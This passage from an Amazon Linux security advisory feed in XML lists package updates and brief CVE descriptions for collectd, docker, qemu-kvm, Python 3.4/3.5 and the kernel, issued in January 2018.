</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16820" title="" id="CVE-2017-16820" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="collectd-disk" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-disk-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-curl_xml" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl_xml-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-mcelog" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-mcelog-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-generic-jmx" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-generic-jmx-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-zookeeper" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-zookeeper-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-mysql" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-mysql-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-lua" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-lua-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-hugepages" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-hugepages-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-apache" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-apache-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-dbi" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-dbi-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-debuginfo" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-debuginfo-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdtool" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-rrdtool-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-iptables" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-iptables-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-chrony" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-chrony-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-email" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-email-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="libcollectdclient-devel" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcollectdclient-devel-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-varnish" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-varnish-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-utils" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-utils-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-amqp" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-amqp-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-write_sensu" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_sensu-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-python" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-python-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-gmond" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-gmond-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-snmp_agent" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-snmp_agent-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-lvm" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-lvm-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-openldap" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-openldap-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-drbd" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-drbd-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-dns" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-dns-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-bind" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-bind-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-java" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-java-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdcached" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-rrdcached-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-netlink" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-netlink-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-ipvs" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipvs-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-memcachec" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-memcachec-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-postgresql" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-postgresql-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="perl-Collectd" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Collectd-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-synproxy" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-synproxy-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-ipmi" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipmi-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-notify_email" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-notify_email-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-write_tsdb" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_tsdb-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-web" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-web-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-snmp" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-snmp-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="libcollectdclient" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcollectdclient-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-nginx" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-nginx-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-write_http" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_http-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-curl" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-chrony" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-chrony-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-web" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-web-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-generic-jmx" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-generic-jmx-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-postgresql" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-postgresql-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-dns" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dns-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-write_http" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_http-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-drbd" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-drbd-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-varnish" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-varnish-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-lua" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-lua-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-email" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-email-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-synproxy" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-synproxy-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-ipvs" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipvs-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-write_tsdb" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_tsdb-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-debuginfo" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-debuginfo-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-utils" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-utils-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-rrdtool" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-rrdtool-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-gmond" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-gmond-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="libcollectdclient-devel" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/libcollectdclient-devel-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="libcollectdclient" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/libcollectdclient-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-ipmi" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipmi-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-notify_email" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-notify_email-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-netlink" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-netlink-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-mysql" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-mysql-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-bind" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-bind-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-dbi" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dbi-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-amqp" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-amqp-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-snmp_agent" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-snmp_agent-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-curl_xml" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl_xml-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-disk" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-disk-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-apache" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-apache-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-iptables" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-iptables-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-hugepages" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-hugepages-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-java" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-java-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-python" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-python-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-snmp" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-snmp-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-openldap" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-openldap-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-write_sensu" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_sensu-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-mcelog" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-mcelog-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-lvm" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-lvm-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-curl" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="perl-Collectd" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Collectd-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-zookeeper" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-zookeeper-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-rrdcached" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-rrdcached-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-nginx" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-nginx-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-memcachec" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-memcachec-5.8.0-2.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-941</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-941: medium priority package update for docker</title><issued date="2018-01-12 21:20:00" /><updated date="2018-01-15 19:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14992:
Lack of content verification in Docker-CE (Also known as Moby) versions 1.12.6-0, 1.10.3, 17.03.0, 17.03.1, 17.03.2, 17.06.0, 17.06.1, 17.06.2, 17.09.0, and earlier allows a remote attacker to cause a Denial of Service via a crafted image layer payload, aka gzip bombing.
1510348:
CVE-2017-14992 docker: Lack of content verification
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14992" title="" id="CVE-2017-14992" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker-debuginfo" version="17.09.1ce" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-17.09.1ce-1.111.amzn1.x86_64.rpm</filename></package><package name="docker" version="17.09.1ce" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-17.09.1ce-1.111.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-942</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-942: important priority package update for qemu-kvm</title><issued date="2018-01-12 21:24:00" /><updated date="2018-01-15 19:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5715:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5715 triggers the speculative execution by utilizing branch target injection. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks.
1519780:
CVE-2017-5715 hw: cpu: speculative execution branch target injection
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715" title="" id="CVE-2017-5715" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-tools" version="1.5.3" release="141.6.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-141.6.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="141.6.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-141.6.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="141.6.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-141.6.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="141.6.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-141.6.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="141.6.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-141.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-943</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-943: medium priority package update for python35 python34</title><issued date="2018-01-17 23:18:00" /><updated date="2018-01-18 00:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000158:
CPython (aka Python) up to 2.7.13 is vulnerable to an integer overflow in the PyString_DecodeEscape function in stringobject.c, resulting in heap-based buffer overflow (and possible arbitrary code execution)
1519595:
CVE-2017-1000158 python: Integer overflow in PyString_DecodeEscape results in heap-base buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000158" title="" id="CVE-2017-1000158" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python35-libs" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.7" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.7-1.37.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.7" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.7-1.37.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.7" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.7-1.37.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.7" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.7-1.37.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.7" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.7-1.37.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.7" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.7-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-944</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-944: important priority package update for kernel</title><issued date="2018-01-18 22:45:00" /><updated date="2018-01-18 22:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8824:
A use-after-free vulnerability was found in DCCP socket code affecting the Linux kernel since 2.6.16. This vulnerability could allow an attacker to their escalate privileges.
1519591:
CVE-2017-8824 kernel: Use-after-free vulnerability in DCCP socket
CVE-2017-17741:
Linux kernel compiled with the KVM virtualization (CONFIG_KVM) support is vulnerable to an out-of-bounds read access issue. It could occur when emulating vmcall instructions invoked by a guest. A guest user/process could use this flaw to disclose kernel memory bytes.
1527112:
CVE-2017-17741 kernel: kvm: stack-based out-of-bounds read via vmcall instruction
CVE-2017-17712:
A flaw was found in the Linux kernel&#039;s implementation of raw_sendmsg allowing a local attacker to panic the kernel or possibly leak kernel addresses. A local attacker, with the privilege of creating raw sockets, can abuse a possible race condition when setting the socket option to allow the kernel to automatically create ip header values and thus potentially escalate their privileges.
1526427:
CVE-2017-17712 kernel: Race condition in raw_sendmsg function allows denial-of-service or kernel addresses leak
CVE-2017-17450:
net/netfilter/xt_osf.c in the Linux kernel through 4.14.4 does not require the CAP_NET_ADMIN capability for add_callback and remove_callback operations, which allows local users to bypass intended access restrictions because the xt_osf_fingers data structure is shared across all net namespaces.
1525761:
CVE-2017-17450 kernel: Unchecked capabilities in net/netfilter/xt_osf.c allows for unprivileged modification to systemwide fingerprint list
CVE-2017-17448:
net/netfilter/nfnetlink_cthelper.c in the Linux kernel through 4.14.4 does not require the CAP_NET_ADMIN capability for new, get, and del operations, which allows local users to bypass intended access restrictions because the nfnl_cthelper_list data structure is shared across all net namespaces.
1525768:
CVE-2017-17448 kernel: Missing capabilities check in net/netfilter/nfnetlink_cthelper.c allows for unprivileged access to systemwide nfnl_cthelper_list structure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17448" title="" id="CVE-2017-17448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17450" title="" id="CVE-2017-17450" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17712" title="" id="CVE-2017-17712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17741" title="" id="CVE-2017-17741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8824" title="" id="CVE-2017-8824" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.77" release="31.58.amzn1" epoch="0" 